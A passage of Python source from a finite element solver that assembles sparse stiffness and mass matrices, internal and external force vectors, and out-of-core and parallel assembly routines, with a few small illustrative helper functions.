+= V_stiff_elem[data_local_indices[elem*local_capacity:(elem+1)*local_capacity]]
if fem_solver.analysis_type != 'static' and fem_solver.is_mass_computed==False:
# SPARSE ASSEMBLY - MASS MATRIX
V_mass[data_global_indices[elem*local_capacity:(elem+1)*local_capacity]] \
+= V_mass_elem[data_local_indices[elem*local_capacity:(elem+1)*local_capacity]]
#if fem_solver.has_moving_boundary:
# RHS ASSEMBLY
# for iterator in range(0,nvar):
# F[mesh.elements[elem,:]*nvar+iterator,0]+=f[iterator::nvar,0]
#RHSAssemblyNative(F,f,elem,nvar,nodeperelem,mesh.elements)
# INTERNAL TRACTION FORCE ASSEMBLY
# for iterator in range(0,nvar):
# T[mesh.elements[elem,:]*nvar+iterator,0]+=t[iterator::nvar,0]
RHSAssemblyNative(T,t,elem,nvar,nodeperelem,mesh.elements)
if fem_solver.parallel:
del ParallelTuple
gc.collect()
if fem_solver.recompute_sparsity_pattern:
stiffness = coo_matrix((V_stiffness,(I_stiffness,J_stiffness)),
shape=((nvar*mesh.points.shape[0],nvar*mesh.points.shape[0])),dtype=np.float64).tocsr()
# GET STORAGE/MEMORY DETAILS
fem_solver.spmat = stiffness.data.nbytes/1024./1024.
fem_solver.ijv = (I_stiffness.nbytes + J_stiffness.nbytes + V_stiffness.nbytes)/1024./1024.
del I_stiffness, J_stiffness, V_stiffness
gc.collect()
if fem_solver.analysis_type != 'static' and fem_solver.is_mass_computed==False:
mass = csr_matrix((V_mass,(I_mass,J_mass)),shape=((nvar*mesh.points.shape[0],
nvar*mesh.points.shape[0])),dtype=np.float64)
fem_solver.is_mass_computed = True
else:
stiffness = csr_matrix((V_stiffness,indices,indptr),
shape=((nvar*mesh.points.shape[0],nvar*mesh.points.shape[0])))
# GET STORAGE/MEMORY DETAILS
fem_solver.spmat = stiffness.data.nbytes/1024./1024.
fem_solver.ijv = (indptr.nbytes + indices.nbytes + V_stiffness.nbytes)/1024./1024.
if fem_solver.analysis_type != 'static' and fem_solver.is_mass_computed==False:
mass = csr_matrix((V_mass,indices,indptr),
shape=((nvar*mesh.points.shape[0],nvar*mesh.points.shape[0])))
fem_solver.is_mass_computed = True
if boundary_condition.applied_pressure is not None:
K_pressure, F_pressure = AssemblyFollowerForces(boundary_condition, mesh, material, function_spaces, fem_solver, Eulerx)
stiffness -= K_pressure
T -= F_pressure[:,None]
fem_solver.assembly_time = time() - t_assembly
return stiffness, T, F, mass
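# ILLUSTRATION ONLY (never called): the triplet assembly above relies on scipy
# summing duplicate (I, J) entries when COO triplets are converted to CSR.
# The toy numbers below are made up purely to show that mechanism in isolation.
def _illustrate_triplet_duplicate_summation():
    """Minimal sketch of how shared elemental contributions are accumulated."""
    I = np.array([0, 1, 1, 2, 1, 1], dtype=np.int32)
    J = np.array([0, 1, 2, 2, 1, 2], dtype=np.int32)
    V = np.array([1., 2., 3., 4., 5., 6.], dtype=np.float64)
    K = coo_matrix((V, (I, J)), shape=(3, 3)).tocsr()
    # The two (1, 1) and the two (1, 2) entries have been added together,
    # exactly as contributions from neighbouring elements are in AssemblySmall.
    assert K[1, 1] == 7.0 and K[1, 2] == 9.0
    return K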
def OutofCoreAssembly(fem_solver, function_space, formulation, mesh, material,
Eulerx, Eulerp, calculate_rhs=True, filename=None, chunk_size=None):
"""Assembly routine for larger than memory system of equations.
Usage of h5py and dask allow us to store the triplets and build a sparse matrix out of
them on disk.
    Note: The sparse matrix itself is created in memory.
"""
import sys, os
from warnings import warn
from time import time
try:
import psutil
except ImportError:
has_psutil = False
raise ImportError("No module named psutil. Please install it using 'pip install psutil'")
# from Core.Supplementary.dsparse.sparse import dok_matrix
if fem_solver.parallel:
warn("Parallel assembly cannot performed on large arrays. \n"
"Out of core 'i.e. Dask' parallelisation is turned on instead. "
"This is an innocuous warning")
try:
import h5py
except ImportError:
has_h5py = False
raise ImportError('h5py is not installed. Please install it first by running "pip install h5py"')
try:
import dask.array as da
except ImportError:
has_dask = False
raise ImportError('dask is not installed. Please install it first by running "pip install toolz && pip install dask"')
if filename is None:
warn("filename not given. I am going to write the output in the current directory")
pwd = os.path.dirname(os.path.realpath(__file__))
filename = os.path.join(pwd,"output.hdf5")
# GET MESH DETAILS
C = mesh.InferPolynomialDegree() - 1
nvar = formulation.nvar
ndim = formulation.ndim
nelem = mesh.nelem
nodeperelem = mesh.elements.shape[1]
# GET MEMORY INFO
memory = psutil.virtual_memory()
    size_of_triplets_gbytes = (nvar*nodeperelem)**2*nelem*(4)*(3)//1024**3
if memory.available//1024**3 > 2*size_of_triplets_gbytes:
warn("Out of core assembly is only efficient for larger than memory "
"system of equations. Using it on smaller matrices can be very inefficient")
hdf_file = h5py.File(filename,'w')
IJV_triplets = hdf_file.create_dataset("IJV_triplets",((nvar*nodeperelem)**2*nelem,3),dtype=np.float32)
# THE I & J VECTORS OF LOCAL STIFFNESS MATRIX DO NOT CHANGE, HENCE COMPUTE THEM ONCE
I_stiff_elem = np.repeat(np.arange(0,nvar*nodeperelem),nvar*nodeperelem,axis=0)
J_stiff_elem = np.tile(np.arange(0,nvar*nodeperelem),nvar*nodeperelem)
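    # For illustration, with nvar*nodeperelem == 2 the two lines above yield
    #   I_stiff_elem = [0, 0, 1, 1]   (np.repeat)
    #   J_stiff_elem = [0, 1, 0, 1]   (np.tile)
    # i.e. the row/column index of each entry of the flattened local matrix.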
I_mass=[];J_mass=[];V_mass=[]; I_mass_elem = []; J_mass_elem = []
if calculate_rhs is False:
F = []
T = []
else:
F = np.zeros((mesh.points.shape[0]*nvar,1),np.float64)
T = np.zeros((mesh.points.shape[0]*nvar,1),np.float64)
# ASSIGN OTHER NECESSARY MATRICES
full_current_row_stiff = []; full_current_column_stiff = []; coeff_stiff = []
full_current_row_mass = []; full_current_column_mass = []; coeff_mass = []
mass = []
gc.collect()
print('Writing the triplets to disk')
t_hdf5 = time()
for elem in range(nelem):
full_current_row_stiff, full_current_column_stiff, coeff_stiff, t, f, \
full_current_row_mass, full_current_column_mass, coeff_mass = GetElementalMatrices(elem,
MainData,mesh.elements,mesh.points,nodeperelem,Eulerx,TotalPot,I_stiff_elem,J_stiff_elem,I_mass_elem,J_mass_elem)
IJV_triplets[(nvar*nodeperelem)**2*elem:(nvar*nodeperelem)**2*(elem+1),0] = full_current_row_stiff.flatten()
IJV_triplets[(nvar*nodeperelem)**2*elem:(nvar*nodeperelem)**2*(elem+1),1] = full_current_column_stiff.flatten()
IJV_triplets[(nvar*nodeperelem)**2*elem:(nvar*nodeperelem)**2*(elem+1),2] = coeff_stiff.flatten()
if calculate_rhs is True:
if MainData.Analysis != 'Static':
# SPARSE ASSEMBLY - MASS MATRIX
I_mass, J_mass, V_mass = SparseAssembly_Step_2(I_mass,J_mass,V_mass,full_current_row_mass,full_current_column_mass,coeff_mass,
nvar,nodeperelem,elem)
if MainData.AssemblyParameters.ExternalLoadNature == 'Nonlinear':
# RHS ASSEMBLY
for iterator in range(0,nvar):
F[mesh.elements[elem,:]*nvar+iterator,0]+=f[iterator::nvar]
# INTERNAL TRACTION FORCE ASSEMBLY
for iterator in range(0,nvar):
T[mesh.elements[elem,:]*nvar+iterator,0]+=t[iterator::nvar,0]
if elem % 10000 == 0:
print("Processed ", elem, " elements")
hdf_file.close()
print('Finished writing the triplets to disk. Time taken', time() - t_hdf5, 'seconds')
print('Reading the triplets back from disk')
hdf_file = h5py.File(filename,'r')
if chunk_size is None:
chunk_size = mesh.points.shape[0]*nvar // 300
print('Creating dask array from triplets')
IJV_triplets = da.from_array(hdf_file['IJV_triplets'],chunks=(chunk_size,3))
print('Creating the sparse matrix')
t_sparse = time()
stiffness = csr_matrix((IJV_triplets[:,2].astype(np.float32),
(IJV_triplets[:,0].astype(np.int32),IJV_triplets[:,1].astype(np.int32))),
shape=((mesh.points.shape[0]*nvar,mesh.points.shape[0]*nvar)),dtype=np.float32)
print('Done creating the sparse matrix, time taken', time() - t_sparse)
hdf_file.close()
return stiffness, T, F, mass
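# ILLUSTRATION ONLY (never called): a self-contained sketch of the HDF5/dask
# round trip used by OutofCoreAssembly above. The file name and triplet values
# are hypothetical; h5py and dask must be installed for it to run.
def _illustrate_outofcore_triplets(filename="_triplet_demo.hdf5"):
    """Write toy IJV triplets to disk, read them back lazily, build a CSR matrix."""
    import h5py
    import dask.array as da
    triplets = np.array([[0, 0, 1.0],
                         [1, 1, 2.0],
                         [1, 1, 3.0]], dtype=np.float32)
    with h5py.File(filename, 'w') as hdf_file:
        hdf_file.create_dataset("IJV_triplets", data=triplets)
    with h5py.File(filename, 'r') as hdf_file:
        ijv = da.from_array(hdf_file["IJV_triplets"], chunks=(2, 3))
        # OutofCoreAssembly passes the dask slices straight to csr_matrix; here
        # they are computed explicitly for clarity - duplicates are again summed.
        rows = ijv[:, 0].compute().astype(np.int32)
        cols = ijv[:, 1].compute().astype(np.int32)
        vals = ijv[:, 2].compute().astype(np.float32)
        stiffness = csr_matrix((vals, (rows, cols)), shape=(2, 2), dtype=np.float32)
    os.remove(filename)
    return stiffness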
#------------------------------- ASSEMBLY ROUTINE FOR EXTERNAL PRESSURE FORCES ----------------------------------#
def AssemblyFollowerForces(boundary_condition, mesh, material, function_spaces, fem_solver, Eulerx):
"""Compute/assemble surface follower forces"""
if boundary_condition.pressure_flags is None:
raise ValueError("Pressure boundary conditions are not set for the analysis")
ndim = mesh.InferSpatialDimension()
nvar = material.nvar
    # FOLLOWER FORCES DEPEND ON THE DIRECTION OF THE FACE/SURFACE
if boundary_condition.pressure_flags.shape[0] == mesh.points.shape[0]:
boundary_condition.pressure_data_applied_at = "node"
raise ValueError("Follower forces applied at nodes. Follower forces should be applied at faces.")
# FUNCTION SPACES TO MAP THE SURFACE FORCE ALONG THE FACE OF THE ELEMENT
if not isinstance(function_spaces,tuple):
raise ValueError("Boundary functional spaces not available for computing pressure stiffness")
else:
        # CHECK IF A FUNCTION SPACE FOR THE BOUNDARY EXISTS - SAFEGUARDS AGAINST FORMULATIONS THAT DO NOT PROVIDE ONE
has_boundary_spaces = False
for fs in function_spaces:
if ndim == 3 and fs.ndim == 2:
has_boundary_spaces = True
break
elif ndim == 2 and fs.ndim == 1:
has_boundary_spaces = True
break
if not has_boundary_spaces:
from Florence import QuadratureRule, FunctionSpace
# COMPUTE BOUNDARY FUNCTIONAL SPACES
p = mesh.InferPolynomialDegree()
bquadrature = QuadratureRule(optimal=3, norder=2*p+1,
mesh_type=mesh.boundary_element_type, is_flattened=False)
bfunction_space = FunctionSpace(mesh.CreateDummyLowerDimensionalMesh(),
bquadrature, p=p, equally_spaced=mesh.IsEquallySpaced, use_optimal_quadrature=False)
function_spaces = (function_spaces[0],bfunction_space)
# COMPUTE AND ASSEMBLY OF THE SURFACE FOLLOWER FORCES
from .FollowerForces import FollowerForces
if boundary_condition.analysis_type == "static":
if fem_solver.recompute_sparsity_pattern:
I_stiffness, J_stiffness, V_stiffness, F = FollowerForces(boundary_condition, mesh, material, function_spaces[-1], fem_solver, Eulerx)
stiffness = coo_matrix((V_stiffness,(I_stiffness,J_stiffness)),
shape=((nvar*mesh.points.shape[0],nvar*mesh.points.shape[0])),dtype=np.float64).tocsr()
else:
            V_stiffness, F = FollowerForces(boundary_condition, mesh, material, function_spaces[-1], fem_solver, Eulerx)
stiffness = csr_matrix((V_stiffness,fem_solver.indices,fem_solver.indptr),
shape=((nvar*mesh.points.shape[0],nvar*mesh.points.shape[0])))
elif boundary_condition.analysis_type == "dynamic":
raise ValueError("Follower forces implemented for dynamic problems.")
return stiffness, F
#----------------- ASSEMBLY ROUTINE FOR TRACTION FORCES ONLY - FOR MODIFIED NEWTON RAPHSON ----------------------#
#----------------------------------------------------------------------------------------------------------------#
def AssembleInternalTractionForces(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp):
# GET MESH DETAILS
C = mesh.InferPolynomialDegree() - 1
nvar = formulation.nvar
ndim = formulation.ndim
nelem = mesh.nelem
nodeperelem = mesh.elements.shape[1]
T = np.zeros((mesh.points.shape[0]*nvar,1),np.float64)
# T = np.zeros((mesh.points.shape[0]*nvar,1),np.float32)
for elem in range(nelem):
t = formulation.GetElementalMatrices(elem,
function_space, mesh, material, fem_solver, Eulerx, Eulerp)[3]
# INTERNAL TRACTION FORCE ASSEMBLY
# for iterator in range(0,nvar):
# T[mesh.elements[elem,:]*nvar+iterator,0]+=t[iterator::nvar,0]
RHSAssemblyNative(T,t,elem,nvar,nodeperelem,mesh.elements)
return T
#------------------------------- ASSEMBLY ROUTINE FOR EXTERNAL TRACTION FORCES ----------------------------------#
#----------------------------------------------------------------------------------------------------------------#
def AssembleForces(boundary_condition, mesh, material, function_spaces, compute_traction_forces=True, compute_body_forces=False):
Ft = np.zeros((mesh.points.shape[0]*material.nvar,1))
Fb = np.zeros((mesh.points.shape[0]*material.nvar,1))
if compute_traction_forces:
Ft = AssembleExternalTractionForces(boundary_condition, mesh, material, function_spaces[-1])
if compute_body_forces:
Fb = AssembleBodyForces(boundary_condition, mesh, material, function_spaces[0])
return Ft + Fb
def AssembleExternalTractionForces(boundary_condition, mesh, material, function_space):
nvar = material.nvar
ndim = material.ndim
ngauss = function_space.AllGauss.shape[0]
if ndim == 2:
faces = mesh.edges
nodeperelem = mesh.edges.shape[1]
else:
faces = mesh.faces
nodeperelem = mesh.faces.shape[1]
if boundary_condition.is_applied_neumann_shape_functions_computed is False:
N = np.zeros((nodeperelem*nvar,nvar,ngauss))
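        # Interleave the scalar basis functions so that row a*nvar + i of N
        # carries basis function a acting on degree of freedom i, for every Gauss point.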
for i in range(nvar):
N[i::nvar,i,:] = function_space.Bases
boundary_condition.__Nt__ = N
boundary_condition.is_applied_neumann_shape_functions_computed = True
else:
N = boundary_condition.__Nt__
F = np.zeros((mesh.points.shape[0]*nvar,1))
for face in range(faces.shape[0]):
if boundary_condition.neumann_flags[face] == True:
ElemTraction = boundary_condition.applied_neumann[face,:]
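            # For each Gauss point k, contract N (ndof x nvar x ngauss) with the
            # prescribed traction (nvar,) and the quadrature weight, then sum over
            # the Gauss points to obtain the elemental force vector of length ndof.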
external_traction = np.einsum("ijk,j,k->ik",N,ElemTraction,function_space.AllGauss[:,0]).sum(axis=1)
RHSAssemblyNative(F,np.ascontiguousarray(external_traction[:,None]),face,nvar,nodeperelem,faces)
# nvar = material.nvar
# ndim = material.ndim
# if ndim == 2:
# faces = np.copy(mesh.edges)
# nodeperelem = mesh.edges.shape[1]
# else:
# faces = np.copy(mesh.faces)
# nodeperelem = mesh.faces.shape[1]
# F = np.zeros((mesh.points.shape[0]*nvar,1))
# for face in range(faces.shape[0]):
# if boundary_condition.neumann_flags[face] == True:
# ElemTraction = boundary_condition.applied_neumann[face,:]
# # LagrangeFaceCoords = mesh.points[faces[face,:],:]
# # ParentGradientX = np.einsum('ijk,jl->kil', function_space.Jm, LagrangeFaceCoords)
# # detJ = np.einsum('i,i->i',function_space.AllGauss[:,0],np.abs(np.linalg.det(ParentGradientX)))
# external_traction = np.zeros((nodeperelem*nvar))
# N = np.zeros((nodeperelem*nvar,nvar))
# for counter in range(function_space.AllGauss.shape[0]):
# for i in range(nvar):
# N[i::nvar,i] = function_space.Bases[:,counter]
# external_traction += np.dot(N,ElemTraction)*function_space.AllGauss[counter,0]
# # RHS ASSEMBLY
# # for iterator in range(0,nvar):
# # F[faces[face,:]*nvar+iterator,0]+=external_traction[iterator::nvar]
# RHSAssemblyNative(F,np.ascontiguousarray(external_traction[:,None]),face,nvar,nodeperelem,faces)
return F
def AssembleBodyForces(boundary_condition, mesh, material, function_space):
nvar = material.nvar
ndim = material.ndim
nodeperelem = mesh.elements.shape[1]
ngauss = function_space.AllGauss.shape[0]
if boundary_condition.is_body_force_shape_functions_computed is False:
N = np.zeros((nodeperelem*nvar,nvar,ngauss))
for i in range(nvar):
N[i::nvar,i,:] = function_space.Bases
boundary_condition.__Nb__ = N
boundary_condition.is_body_force_shape_functions_computed = True
else:
N = boundary_condition.__Nb__
F = np.zeros((mesh.points.shape[0]*nvar,1))
# BODY FORCE IS APPLIED IN THE Z-DIRECTION
ElemTraction = np.zeros(nvar); ElemTraction[ndim-1] = -material.rho
for elem in range(mesh.nelem):
body_force = np.einsum("ijk,j,k->ik",N,ElemTraction,function_space.AllGauss[:,0]).sum(axis=1)
RHSAssemblyNative(F,np.ascontiguousarray(body_force[:,None]),elem,nvar,nodeperelem,mesh.elements)
# nvar = material.nvar
# ndim = material.ndim
# nodeperelem = mesh.elements.shape[1]
# F = np.zeros((mesh.points.shape[0]*nvar,1))
# # BODY FORCE IS APPLIED IN THE Z-DIRECTION
# ElemTraction = np.zeros(nvar); ElemTraction[ndim-1] = -material.rho
# for elem in range(mesh.nelem):
# # LagrangeElemCoords = mesh.points[mesh.elements[elem,:],:]
# body_force = np.zeros((nodeperelem*nvar))
# N = np.zeros((nodeperelem*nvar,nvar))
# for counter in range(function_space.AllGauss.shape[0]):
# for i in range(nvar):
# N[i::nvar,i] = function_space.Bases[:,counter]
# body_force += np.dot(N,ElemTraction)*function_space.AllGauss[counter,0]
# # RHS ASSEMBLY
# # for iterator in range(0,nvar):
# # F[faces[elem,:]*nvar+iterator,0]+=body_force[iterator::nvar]
# RHSAssemblyNative(F,np.ascontiguousarray(body_force[:,None]),elem,nvar,nodeperelem,mesh.elements)
return F
#---------------------------------------- EXPLICIT ASSEMBLY ROUTINES --------------------------------------------#
#----------------------------------------------------------------------------------------------------------------#
def AssembleExplicit_NoLLD_Traction(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp):
# GET MESH DETAILS
C = mesh.InferPolynomialDegree() - 1
nvar = formulation.nvar
ndim = formulation.ndim
nelem = mesh.nelem
nodeperelem = mesh.elements.shape[1]
T = np.zeros((mesh.points.shape[0]*nvar,1),np.float64)
F = []
if fem_solver.has_moving_boundary:
F = np.zeros((mesh.points.shape[0]*nvar,1),np.float64)
for elem in range(nelem):
t, f = formulation.GetElementalMatricesInVectorForm(elem,
function_space, mesh, material, fem_solver, Eulerx, Eulerp)[:2]
if fem_solver.has_moving_boundary:
# RHS ASSEMBLY
RHSAssemblyNative(F,f,elem,nvar,nodeperelem,mesh.elements)
# INTERNAL TRACTION FORCE ASSEMBLY
RHSAssemblyNative(T,t,elem,nvar,nodeperelem,mesh.elements)
return T, F
def AssembleExplicit_NoLLD_Mass(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp):
# GET MESH DETAILS
nvar = formulation.nvar
ndim = formulation.ndim
nelem = mesh.nelem
nodeperelem = mesh.elements.shape[1]
I_mass=[]; J_mass=[]; V_mass=[]
if fem_solver.mass_type == "lumped":
M = np.zeros((mesh.points.shape[0]*nvar,1),np.float64)
else:
# ALLOCATE VECTORS FOR SPARSE ASSEMBLY OF MASS MATRIX - CHANGE TYPES TO INT64 FOR DoF > 1e09
I_mass=np.zeros(int((nvar*nodeperelem)**2*nelem),dtype=np.int32)
J_mass=np.zeros(int((nvar*nodeperelem)**2*nelem),dtype=np.int32)
V_mass=np.zeros(int((nvar*nodeperelem)**2*nelem),dtype=np.float64)
M = []
for elem in range(nelem):
LagrangeElemCoords = mesh.points[mesh.elements[elem,:],:]
EulerElemCoords = Eulerx[mesh.elements[elem,:],:]
if formulation.fields == "electro_mechanics":
ElectricPotentialElem = Eulerp[mesh.elements[elem,:]]
else:
ElectricPotentialElem = []
# COMPUTE THE MASS MATRIX
if material.has_low_level_dispatcher:
mass = formulation.__GetLocalMass_Efficient__(function_space,material,LagrangeElemCoords,EulerElemCoords,fem_solver,elem)
else:
mass = formulation.GetLocalMass_Efficient(function_space,material,LagrangeElemCoords,EulerElemCoords,fem_solver,elem)
if fem_solver.mass_type == "lumped":
mass = formulation.GetLumpedMass(mass)
RHSAssemblyNative(M,mass,elem,nvar,nodeperelem,mesh.elements)
else:
# SPARSE ASSEMBLY - MASS MATRIX
I_mass_elem, J_mass_elem, V_mass_elem = formulation.FindIndices(mass)
SparseAssemblyNative(I_mass_elem,J_mass_elem,V_mass_elem,I_mass,J_mass,V_mass,
elem,nvar,nodeperelem,mesh.elements)
# SET MASS FLAG HERE
if fem_solver.is_mass_computed is False:
if fem_solver.mass_type == "consistent":
M = csr_matrix((V_mass,(I_mass,J_mass)),shape=((nvar*mesh.points.shape[0],
nvar*mesh.points.shape[0])),dtype=np.float64)
fem_solver.is_mass_computed = True
return M
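# ILLUSTRATION ONLY (never called): one common way to lump a consistent mass
# matrix is to collapse each row onto the diagonal (row-sum lumping). Whether
# formulation.GetLumpedMass uses exactly this rule is an assumption here; the
# sketch only shows the shape difference exploited above (a CSR matrix for
# "consistent" versus a flat vector for "lumped").
def _illustrate_row_sum_lumping(consistent_mass):
    """Return the row-sum lumped counterpart of a (sparse) consistent mass matrix."""
    return np.asarray(consistent_mass.sum(axis=1)).ravel()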
def AssembleExplicit(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp):
if fem_solver.has_low_level_dispatcher and fem_solver.is_mass_computed is True:
if not material.has_low_level_dispatcher:
raise RuntimeError("Cannot dispatch to low level module, since material {} does not support it".format(type(material).__name__))
if fem_solver.parallel:
T = ExplicitParallelLauncher(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp)
return T[:,None], [], []
else:
T, F, M = _LowLevelAssemblyExplicit_(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp)
return T[:,None], F, M
else:
if fem_solver.has_low_level_dispatcher:
if fem_solver.parallel:
T = ExplicitParallelLauncher(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp)
else:
T = _LowLevelAssemblyExplicit_(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp)[0]
try:
t_mass_assembly = time()
from Florence.VariationalPrinciple._MassIntegrand_ import __TotalConstantMassIntegrand__
if fem_solver.recompute_sparsity_pattern:
M, I_mass, J_mass, V_mass = __TotalConstantMassIntegrand__(mesh, function_space, formulation, fem_solver.mass_type)
if fem_solver.mass_type == "consistent":
M = csr_matrix((V_mass,(I_mass,J_mass)),shape=((formulation.nvar*mesh.points.shape[0],
formulation.nvar*mesh.points.shape[0])),dtype=np.float64)
else:
M, V_mass = __TotalConstantMassIntegrand__(mesh, function_space,
formulation, fem_solver.mass_type, fem_solver.recompute_sparsity_pattern,
fem_solver.squeeze_sparsity_pattern, fem_solver.indices, fem_solver.indptr,
fem_solver.data_global_indices, fem_solver.data_local_indices)
if fem_solver.mass_type == "consistent":
M = csr_matrix((V_mass,fem_solver.indices,fem_solver.indptr),shape=((formulation.nvar*mesh.points.shape[0],
formulation.nvar*mesh.points.shape[0])),dtype=np.float64)
# SET MASS FLAG HERE
if fem_solver.is_mass_computed is False:
fem_solver.is_mass_computed = True
t_mass_assembly = time() - t_mass_assembly
print("Assembled mass matrix. Time elapsed was {} seconds".format(t_mass_assembly))
return T[:,None], [], M
except ImportError:
# CONTINUE DOWN
warn("Low level mass assembly not available. Falling back to python version")
M = AssembleExplicit_NoLLD_Mass(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp)
T, F = AssembleExplicit_NoLLD_Traction(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp)
return T[:,None], F, M
#---------------------------------------- PARALLEL ASSEMBLY ROUTINES --------------------------------------------#
#----------------------------------------------------------------------------------------------------------------#
class ImplicitParallelZipper(object):
def __init__(self, fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp):
self.fem_solver = fem_solver.__class__(analysis_type=fem_solver.analysis_type,
analysis_nature=fem_solver.analysis_nature)
self.function_space = function_space
self.formulation = formulation
self.mesh = mesh
self.material = material
self.Eulerx = Eulerx
self.Eulerp = Eulerp
def ImplicitParallelExecuter_PoolBased(functor):
return _LowLevelAssembly_Par_(functor.fem_solver, functor.function_space,
functor.formulation, functor.mesh, functor.material, functor.Eulerx, functor.Eulerp)
def ImplicitParallelExecuter_ProcessBased(functor, proc, tups):
tup = _LowLevelAssembly_Par_(functor.fem_solver, functor.function_space,
functor.formulation, functor.mesh, functor.material, functor.Eulerx, functor.Eulerp)
tups[proc] = tup
# tups.append(tup) # FOR SERIAL CHECKS
def ImplicitParallelExecuter_ProcessQueueBased(functor, queue):
tups = _LowLevelAssembly_Par_(functor.fem_solver, functor.function_space,
functor.formulation, functor.mesh, functor.material, functor.Eulerx, functor.Eulerp)
queue.put(tups)
def ImplicitParallelLauncher(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp):
from multiprocessing import Process, Pool, Manager, Queue
from contextlib import closing
# GET MESH DETAILS
nvar = formulation.nvar
ndim = formulation.ndim
nelem = mesh.nelem
nnode = mesh.points.shape[0]
nodeperelem = mesh.elements.shape[1]
local_capacity = int((nvar*nodeperelem)**2)
pmesh, pelement_indices, pnode_indices, partitioned_maps = fem_solver.pmesh, \
fem_solver.pelement_indices, fem_solver.pnode_indices, fem_solver.partitioned_maps
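    # pmesh[i] is the i-th submesh; pelement_indices[i]/pnode_indices[i] map its
    # elements/nodes back to the global mesh, and partitioned_maps[i] translates
    # the locally numbered triplet indices returned by each worker into global
    # degree-of-freedom numbers (see the scatter loops further below).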
# ALLOCATE VECTORS FOR SPARSE ASSEMBLY OF STIFFNESS MATRIX - CHANGE TYPES TO INT64 FOR DoF > 1e09
I_stiffness=np.zeros((nelem,local_capacity),dtype=np.int32)
J_stiffness=np.zeros((nelem,local_capacity),dtype=np.int32)
V_stiffness=np.zeros((nelem,local_capacity),dtype=np.float64)
I_mass=[]; J_mass=[]; V_mass=[]
if fem_solver.analysis_type !='static' and fem_solver.is_mass_computed is False:
# ALLOCATE VECTORS FOR SPARSE ASSEMBLY OF MASS MATRIX - CHANGE TYPES TO INT64 FOR DoF > 1e09
I_mass=np.zeros((nelem,local_capacity),dtype=np.int32)
J_mass=np.zeros((nelem,local_capacity),dtype=np.int32)
V_mass=np.zeros((nelem,local_capacity),dtype=np.float64)
T = np.zeros((mesh.points.shape[0],nvar),np.float64)
funcs = []
for proc in range(fem_solver.no_of_cpu_cores):
pnodes = pnode_indices[proc]
Eulerx_current = Eulerx[pnodes,:]
Eulerp_current = Eulerp[pnodes]
funcs.append(ImplicitParallelZipper(fem_solver, function_space, formulation,
pmesh[proc], material, Eulerx_current, Eulerp_current))
# # SERIAL
# tups = []
# for i in range(fem_solver.no_of_cpu_cores):
# ImplicitParallelExecuter_ProcessBased(funcs[i], i, tups)
# for i in range(fem_solver.no_of_cpu_cores):
# pnodes = pnode_indices[i]
# pelements = pelement_indices[i]
# I_stiffness[pelements,:] = partitioned_maps[i][tups[i][0]].reshape(pmesh[i].nelem,local_capacity)
# J_stiffness[pelements,:] = partitioned_maps[i][tups[i][1]].reshape(pmesh[i].nelem,local_capacity)
# V_stiffness[pelements,:] = tups[i][2].reshape(pmesh[i].nelem,local_capacity)
# T[pnodes,:] += tups[i][-1].reshape(pnodes.shape[0],nvar)
# if fem_solver.analysis_type != "static" and fem_solver.is_mass_computed is False:
# I_stiffness[pelements,:] = partitioned_maps[i][tups[i][3]].reshape(pmesh[i].nelem,local_capacity)
# J_stiffness[pelements,:] = partitioned_maps[i][tups[i][4]].reshape(pmesh[i].nelem,local_capacity)
# V_stiffness[pelements,:] = tups[i][5].reshape(pmesh[i].nelem,local_capacity)
# POOL BASED
if fem_solver.parallel_model == "pool":
with closing(Pool(processes=fem_solver.no_of_cpu_cores)) as pool:
tups = pool.map(ImplicitParallelExecuter_PoolBased,funcs)
pool.terminate()
# THREAD POOL INSTEAD OF PROCESSING POOL
elif fem_solver.parallel_model == "thread_pool":
import multiprocessing.dummy
with closing(multiprocessing.dummy.Pool(fem_solver.no_of_cpu_cores)) as pool:
tups = pool.map(ImplicitParallelExecuter_PoolBased,funcs)
pool.terminate()
# DASK BASED
elif fem_solver.parallel_model == "dask":
try:
from dask.distributed import Client, LocalCluster
except ImportError:
raise ImportError("dask is not installed. Install it 'using pip install dask[complete]'")
# CREATE A DUMMY CALLABLE
# reducer = lambda tups: tups
# INITIALISE CLUSTER
# cluster = LocalCluster(n_workers=fem_solver.no_of_cpu_cores, processes=False, threads_per_worker=None)
# client = Client(cluster)
# client = Client() # FOR ACTUAL/REMOTE CLSUTERS
client = fem_solver.dask_client
future = client.scatter(funcs)
job = client.map(ImplicitParallelExecuter_PoolBased, future)
# MAP/REDUCE
# total = client.submit(reducer, job)
# tups = total.result()
# OR GATHER
tups = client.gather(job)
# client.close() # DONT CLOSE OTHERWISE FEMSOLVER HAS TO RELAUNCH
# JOBLIB BASED
elif fem_solver.parallel_model == "joblib":
try:
from joblib import Parallel, delayed
except ImportError:
raise ImportError("Joblib is not installed. Install it 'using pip install joblib'")
tups = Parallel(n_jobs=fem_solver.no_of_cpu_cores)(delayed(ImplicitParallelExecuter_PoolBased)(func) for func in funcs)
# tups = Parallel(n_jobs=10, backend="threading")(delayed(ImplicitParallelExecuter_PoolBased)(func) for func in funcs)
# SCOOP BASED
elif fem_solver.parallel_model == "scoop":
try:
from scoop import futures
except ImportError:
raise ImportError("Scoop is not installed. Install it 'using pip install scoop'")
# tups = futures.map(ImplicitParallelExecuter_PoolBased, funcs)
tups = list(futures.map(ImplicitParallelExecuter_PoolBased, funcs))
# PROCESS AND MANAGER BASED
elif fem_solver.parallel_model == "context_manager":
procs = []
manager = Manager(); tups = manager.dict() # SPAWNS A NEW PROCESS
for i, func in enumerate(funcs):
proc = Process(target=ImplicitParallelExecuter_ProcessBased, args=(func,i,tups))
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
# PROCESS AND QUEUE BASED
elif fem_solver.parallel_model == "queue":
procs = []
for i, func in enumerate(funcs):
queue = Queue()
proc = Process(target=ImplicitParallelExecuter_ProcessQueueBased, args=(func,queue))
proc.daemon = True
procs.append(proc)
proc.start()
tups = queue.get()
pnodes = pnode_indices[i]
pelements = pelement_indices[i]
